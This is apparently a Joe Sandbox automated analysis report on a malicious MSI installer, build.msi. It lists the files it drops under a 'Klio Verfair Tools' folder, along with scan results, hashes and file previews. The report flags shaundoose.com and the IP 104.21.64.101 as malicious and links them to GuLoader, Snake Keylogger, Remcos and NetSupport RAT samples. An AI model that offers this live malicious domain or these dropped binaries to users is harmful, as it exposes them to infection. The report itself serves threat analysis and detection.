    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libGLESv2.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libcds.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libssl-1_1-x64.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\mksSandbox.exe | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\elevate.exe | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\UAC.exe | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x64.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x86.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x64.exe | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x86.exe | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exe | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\sigc-2.0.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vk_swiftshader.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmauthd.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmclientcore.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmeventmsg.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmnetBridge.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vulkan-1.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\zlib1.dll | 0% | ReversingLabs |
    C:\Windows\Installer\MSI6389.tmp | 0% | ReversingLabs |
    C:\Windows\Installer\MSI6501.tmp | 0% | ReversingLabs |
    C:\Windows\Installer\MSI6560.tmp | 0% | ReversingLabs |
    C:\Windows\Installer\MSI659F.tmp | 0% | ReversingLabs |
    C:\Windows\Installer\MSI65EE.tmp | 0% | ReversingLabs |
    C:\Windows\Installer\MSI6E8B.tmp | 0% | ReversingLabs |
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://www.idpf.org/2007/opfapplication/xhtml | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/manualArialwebsiteArial | 0% | Avira URL Cloud | safe
    http://www.gribuser.ru/xml/fictionbook/2.0 | 0% | Avira URL Cloud | safe
    http://www.daisy.org/z3986/2005/ncx/ | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/settings/settings3-5-1.html8.33 | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/update-check-rel.txtnotifUpdateCheckInProgress | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/docs/Version-history.html | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/docs/Keyboard-shortcutssumatrapdfrestrict.inihttps://www.sumatrapdf | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/download-free-pdf-viewer------------- | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/dl/prerel/PRE_RELEASE_VER/SumatraPDF-prerel | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/settings/settings3-5-1.html | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/update-check-rel.txt | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsaI | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/URLUpdateInfohttps://www.sumatrapdfreader.org/docs/Version-history. | 0% | Avira URL Cloud | safe
    https://sumatra-website.onrender.com/update-check-rel.txtInstaller64LatestInstaller32InstallerArm64P | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/docs/Submit-crash-report.html | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/download-free-pdf-viewer | 0% | Avira URL Cloud | safe
    https://www.sumatrapdfreader.org/docs/Corrupted-installation | 0% | Avira URL Cloud | safe
    https://shaundoose.com/diagnostics.phpAI_DOWNGRADE4010AI_PRESERVE_INSTALL_TYPEPreserveInstallTypeAI_ | 100% | Avira URL Cloud | malware
    http://www.idpf.org/2007/opf | 0% | Avira URL Cloud | safe


    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    shaundoose.com | 104.21.64.101 | true | true | | unknown
                                                                                                              https://www.sumatrapdfreader.org/update-check-rel.txtlauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://ocsp.sectigo.com0$rufus-4.6p.exe.4.drfalse
                                                                                                                high
                                                                                                                https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrlel.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drfalse
                                                                                                                  high
                                                                                                                  https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsaIlauncher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://github.com/chrisant996/clink/issues/45);CHANGES.4.drfalse
                                                                                                                    high
                                                                                                                    https://github.com/chrisant996/clink/issues/64);CHANGES.4.drfalse
                                                                                                                      high
                                                                                                                      https://github.com/mridgers/clink/issues/503)CHANGES.4.drfalse
                                                                                                                        high
                                                                                                                        https://sumatra-website.onrender.com/update-check-rel.txtInstaller64LatestInstaller32InstallerArm64Plauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zelevate.exe.4.drfalse
                                                                                                                          high
                                                                                                                          https://github.com/chrisant996/clink/issues/111);CHANGES.4.drfalse
                                                                                                                            high
                                                                                                                            https://github.com/chrisant996/clink/issues/13)CHANGES.4.drfalse
                                                                                                                              high
                                                                                                                              https://github.com/mridgers/clink/issues/257)).CHANGES.4.drfalse
                                                                                                                                high
                                                                                                                                https://support.google.com/chrome/a/answer/9122284el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.sumatrapdfreader.org/docs/Corrupted-installationlauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.sumatrapdfreader.org/docs/Submit-crash-report.htmllauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
https://shaundoose.com/diagnostics.phpAI_DOWNGRADE4010AI_PRESERVE_INSTALL_TYPEPreserveInstallTypeAI_ | build.msi | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.64.101 | shaundoose.com | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1648463
Start date and time:2025-03-25 21:00:48 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 41s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:build.msi
Detection:MAL
Classification:mal72.winMSI@6/117@1/1
EGA Information:Failed
HCA Information:Failed
Cookbook Comments:
• Found application associated with file extension: .msi
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.31.69.3, 4.245.163.56, 20.24.125.47, 150.171.28.10
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, g.bing.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target launcher.exe, PID 564 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.64.101 | r3gIOL7UsA.msi | malicious | Unknown |
104.21.64.101 | build.msi | malicious | Unknown |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
shaundoose.com | r3gIOL7UsA.msi | malicious | Unknown | 104.21.64.101
shaundoose.com | build.msi | malicious | Unknown | 104.21.64.101
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19SAMHWA.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          SAMHWA.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          Patch-HWMonitor.Pro.1.3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          HWMonitorPro_x64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          znicegreatveryspecialguestyourareforme.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          rPedidodeCota____o-20250325_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          867194897_fedex-factura.batGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          Hesap Hareketleri 24-03-2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          Pedido de Cota.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          Ll57CUTdDq.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                          • 104.21.64.101
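Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exe | r3gIOL7UsA.msi | malicious | Unknown
C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exe | build.msi | malicious | Unknown
C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exe | 7T7bCyA.exe | malicious | Unknown
C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exe | #U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe | malicious | MicroClip
C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll | r3gIOL7UsA.msi | malicious | Unknown
C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll | build.msi | malicious | Unknown
C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll | 7T7bCyA.exe | malicious | Unknown
C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll | #U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe | malicious | MicroClip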
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):23978
                                                                                                                                                                                          Entropy (8bit):5.787317377031681
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:hdjhRnij3e8TiTbB4Nw+sz8BgGzPEftQCmz8TYJjPx1G1GfiF:hdjhRij30TbB4Nw+szcgUZPx1+/
                                                                                                                                                                                          MD5:6EAC3B207E4708F025307AD19635C092
                                                                                                                                                                                          SHA1:4E297294F363B429D4D5C8776EFE28423E56A1ED
                                                                                                                                                                                          SHA-256:C70477582C4C655CF3C66AD123EDF44BEEA87078B280C84F1935341DC8729617
                                                                                                                                                                                          SHA-512:60E670042641F829FD87DB28565F428C45CC01A4B159607160CC2CE2FD3B2CAAF853944A1F7429CA50FDB951024FD0FA1C1A09E0575B0E8B48F26D7EEB634F14
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:V:V
                                                                                                                                                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                          Preview:0
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:MS Windows icon resource - 9 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):167778
                                                                                                                                                                                          Entropy (8bit):2.423036328943719
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:B5eYCuQJjl4boYvgeutkN6gKlKDcyOCC5+dQH7AJI:BU9d5dbkkgmKxOv5iqcJI
                                                                                                                                                                                          MD5:A310A096108CD50A73694E2EC3DD9165
                                                                                                                                                                                          SHA1:F78594FA3D02CE3A462DD19A0B9A6579E1FADA6C
                                                                                                                                                                                          SHA-256:5A601BF5643905CD160C012C50214308215873302B247DEB95EB4CC4426BDA37
                                                                                                                                                                                          SHA-512:4E436E8302EF194025D6DC43B46B4EE3418010DE9B048CE5D6A5B04516ADD88EEF509243F4C72D3B6730157C9D6A0E2521042B28FA3F4C31630DD07DC5A2E085
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:MS Windows icon resource - 7 icons, 256x256, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):372526
                                                                                                                                                                                          Entropy (8bit):4.467275942115759
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:aAVWno2eoqXRy8QGSi6H0NOJe6ay1lrnyoeFM8UuPLZoELS/8taek6KYrOzzCIhZ:LCANx6xPZX9mBW
                                                                                                                                                                                          MD5:B52B2D1D4C9E56CA24AB0CD0730CC5AD
                                                                                                                                                                                          SHA1:C70A3683DF57DE3096CA58F314C0B649035392CC
                                                                                                                                                                                          SHA-256:73CDA59B9158F5DCA967A6EC24A3608C672DCA63F714BFD7B7B5F81C1303F457
                                                                                                                                                                                          SHA-512:CDCAB1C415B87948AD45C967D6C50EA24935D7E58CFC30717E2943D9CE9F5DDEFCB5E60BCE58F9F387635EA30E1A0399DBA644316CC53F1802BAE73B76CB1BFA
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1907712
                                                                                                                                                                                          Entropy (8bit):6.301794990819788
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:tL9NgP+4hcdTDeM1EF7Jx2meoI4Tzp7iyeNgzd6Nv7:x9NgPjM1E7JPx+ye5
                                                                                                                                                                                          MD5:C4AABD70DC28C9516809B775A30FDD3F
                                                                                                                                                                                          SHA1:43804FA264BF00ECE1EE23468C309BC1BE7C66DE
                                                                                                                                                                                          SHA-256:882063948D675EE41B5AE68DB3E84879350EC81CF88D15B9BABF2FA08E332863
                                                                                                                                                                                          SHA-512:5A88EC6714C4F78B061AED2F2F9C23E7B69596C1185FCB4B21B4C20C84B262667225CC3F380D6E31A47F54A16DC06E4D6AD82CFCA7F499450287164C187CEC51
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Joe Sandbox View:
• Filename: r3gIOL7UsA.msi, Detection: malicious
• Filename: build.msi, Detection: malicious
• Filename: 7T7bCyA.exe, Detection: malicious
• Filename: #U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe, Detection: malicious
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):564736
                                                                                                                                                                                          Entropy (8bit):6.204814981249317
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:jrx//c1kmegKVcvbYAgZ+ml1PUEynhwNblha:5s1DetKMT7yV
                                                                                                                                                                                          MD5:B6D5860F368B28CAA9DD14A51666A5CD
                                                                                                                                                                                          SHA1:DB96D4B476005A684F4A10480C722B3D89DDE8A5
                                                                                                                                                                                          SHA-256:E2CA3EC168AE9C0B4115CD4FE220145EA9B2DC4B6FC79D765E91F415B34D00DE
                                                                                                                                                                                          SHA-512:D2BB1D4F194091FC9F3A2DD27D56105E72C46DB19AF24B91AF84E223FFCC7FEC44B064BF94B63876EE7C20D40C45730B61AA6B1E327947D6FB1633F482DAA529
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                          • Filename: r3gIOL7UsA.msi, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: build.msi, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 7T7bCyA.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: #U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe, Detection: malicious, Browse
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1096
                                                                                                                                                                                          Entropy (8bit):5.13006727705212
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                          MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                          SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                          SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                                          SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Sat Mar 8 06:57:16 2025, mtime=Tue Mar 25 19:01:55 2025, atime=Sat Mar 8 06:57:16 2025, length=1622832, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2109
                                                                                                                                                                                          Entropy (8bit):3.8854872834980223
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:8qfs8AZREjKjqbdt9p+SlEd6n8AU1sWlvk6OwwblnacPcdu1bH6OwwblnacP3vJO:8qx1jKjqbdt99auq85BaJdu1bH5BaW
                                                                                                                                                                                          MD5:0DD46F10B39D7C9278B0CA289BFF14DD
                                                                                                                                                                                          SHA1:5EC2ED5A6D55287C836FAA21391D4E73A485C75D
                                                                                                                                                                                          SHA-256:DB90F13957032F966840DC846EC4159191C12D421426EF14F56B92570C7CC806
                                                                                                                                                                                          SHA-512:8B3D1122D5BA2B7A067601A9F2E5151D972E53E908964AD81C061A668C6DCE9945C84D4BC54689711300334FEAA2B8710AA5D868B20082891A589AD1EE59252E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:L..................F.@.. .....`...............`.....0.......................H.:..DG..Yr?.D..U..k0.&...&...... M.............w~.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlyZ6.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....yZ:...Roaming.@......DWSlyZ:.....C......................:.R.o.a.m.i.n.g.....\.1.....yZ:...TASOVC~1..D......yZ:.yZ:............................:.T.a.s.o.v.C.o.o.p.....n.1.....yZ<...KLIOVE~1..V......yZ:.yZ<.....X......................Y.K.l.i.o. .V.e.r.f.a.i.r. .T.o.o.l.s.....j.2.0...hZ(? .RUFUS-~1.EXE..N......hZ(?yZ<.....nC........................r.u.f.u.s.-.4...6.p...e.x.e.......z...............-.......y..............e.....C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exe......\.r.u.f.u.s.-.4...6.p...e.x.e.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.T.a.s.o.v.C.o.o.p.\.K.l.i.o. .V.e.r.f.a.i.r. .T.o.o.l.s.\.h.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.
                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1900
                                                                                                                                                                                          Entropy (8bit):5.180248730416717
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:bsGMk3jjseCLuvkkKtY/K0iswT415VPv4CBzqjZB:AGMk3kehkkKtY/Fix4BvvqB
                                                                                                                                                                                          MD5:9ED21E577A97042CD77162F3C62E053B
                                                                                                                                                                                          SHA1:6A8C0394CAC21AC5A0DF62F9609B3210A43EC73F
                                                                                                                                                                                          SHA-256:C7303B352078613D9BCD814223C4DA0E71B5F867FB5EE8C44342CA6871B9397B
                                                                                                                                                                                          SHA-512:C0118F6DE579A292085E3F87A13C10F3B5615DC8DFE1EFAA656B88DB6EEF9AC532B654982CF96C408E149EC2747BE5E89A1793178B7C0FA1935A8FEB56A852A6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.# For documentation, see https://www.sumatrapdfreader.org/settings/settings3-5-1.html..Theme = Light..FixedPageUI [...TextColor = #000000...BackgroundColor = #ffffff...SelectionColor = #f5fc0c...WindowMargin = 2 4 2 4...PageSpacing = 4 4...InvertColors = false...HideScrollbars = false..]..ComicBookUI [...WindowMargin = 0 0 0 0...PageSpacing = 4 4...CbxMangaMode = false..]..ChmUI [...UseFixedPageUI = false..]....SelectionHandlers [..]..ExternalViewers [..]....ZoomLevels = 8.33 12.5 18 25 33.33 50 66.67 75 100 125 150 200 300 400 600 800 1000 1200 1600 2000 2400 3200 4800 6400..ZoomIncrement = 0....PrinterDefaults [...PrintScale = shrink..]..ForwardSearch [...HighlightOffset = 0...HighlightWidth = 15...HighlightColor = #6581ff...HighlightPermanent = false..]..Annotations [...HighlightColor = #ffff00...UnderlineColor = #00ff00...SquigglyColor = #ff00ff...StrikeOutColor = #ff0000...FreeTextColor = ...FreeTextSize = 12...FreeTextBorderWidth = 1...TextIconColor = ...TextIconType = ...Defa
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):138488
                                                                                                                                                                                          Entropy (8bit):5.92047745641961
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:7g1SuZHbpYkExO4R7/c1GKvf1O+vOQD63NzFW1BUBPBP7UulBJegBwn4aqtdVeac:7B27pQQD63VFW1BUBPBP7UulfAX
                                                                                                                                                                                          MD5:0DE5F0DC500841DEAACF7E6E1F651314
                                                                                                                                                                                          SHA1:D7DA1A79DFE54B4F2A37943476C73D0AAAE002A9
                                                                                                                                                                                          SHA-256:F172CDEB17A218BF27F371AE22DD6EBB6EE0E9D0470462FEB9B6D68E0D50B623
                                                                                                                                                                                          SHA-512:55D7E9C272DA604369DC8C1E1730DF41BEE75D786AE1D5A1B94230B42CF16CE825B2FA26C1B5BA6D5FDED345E46A88DD88B60D7109C0D8A2CC6CCDCAA480E9CD
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):129776
                                                                                                                                                                                          Entropy (8bit):6.136389553753588
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:Js1SuZHbpYkExO4R7/c1GKvf1O+vOQD63NzFW1BUBPBP7UulBJnkwwpb:JV27pQQD63VFW1BUBPBP7UulYFb
                                                                                                                                                                                          MD5:BB0A95F980C536257863BE7FE103E8A8
                                                                                                                                                                                          SHA1:04C8E4BC9AC7B31F76DE8D418FB32590E45D29FC
                                                                                                                                                                                          SHA-256:49D4E8DF3D4749266E273161FCA487567F2D794BB0B3371A85BC3FC8784500DB
                                                                                                                                                                                          SHA-512:29540BF0F6ECB2715B4655FF85262C2BE362CC446ADC7F3B411F959D8EE23242F791AF9FB6463B6D735E844C580DB695CA1B6962E17E2746DF67447A3AEC2432
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):135416
                                                                                                                                                                                          Entropy (8bit):5.940222683224963
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:ih1SuZHbpYkExO4R7/c1GKvf1O+vOQD63NzFW1BUBPBP7UulBJ4nD6P12sEc:i+27pQQD63VFW1BUBPBP7Uulr1B
                                                                                                                                                                                          MD5:6248DA5B425B537375F2C5590B6CDC88
                                                                                                                                                                                          SHA1:B36243C72E95F22F831E2643153A2F3DCB84D843
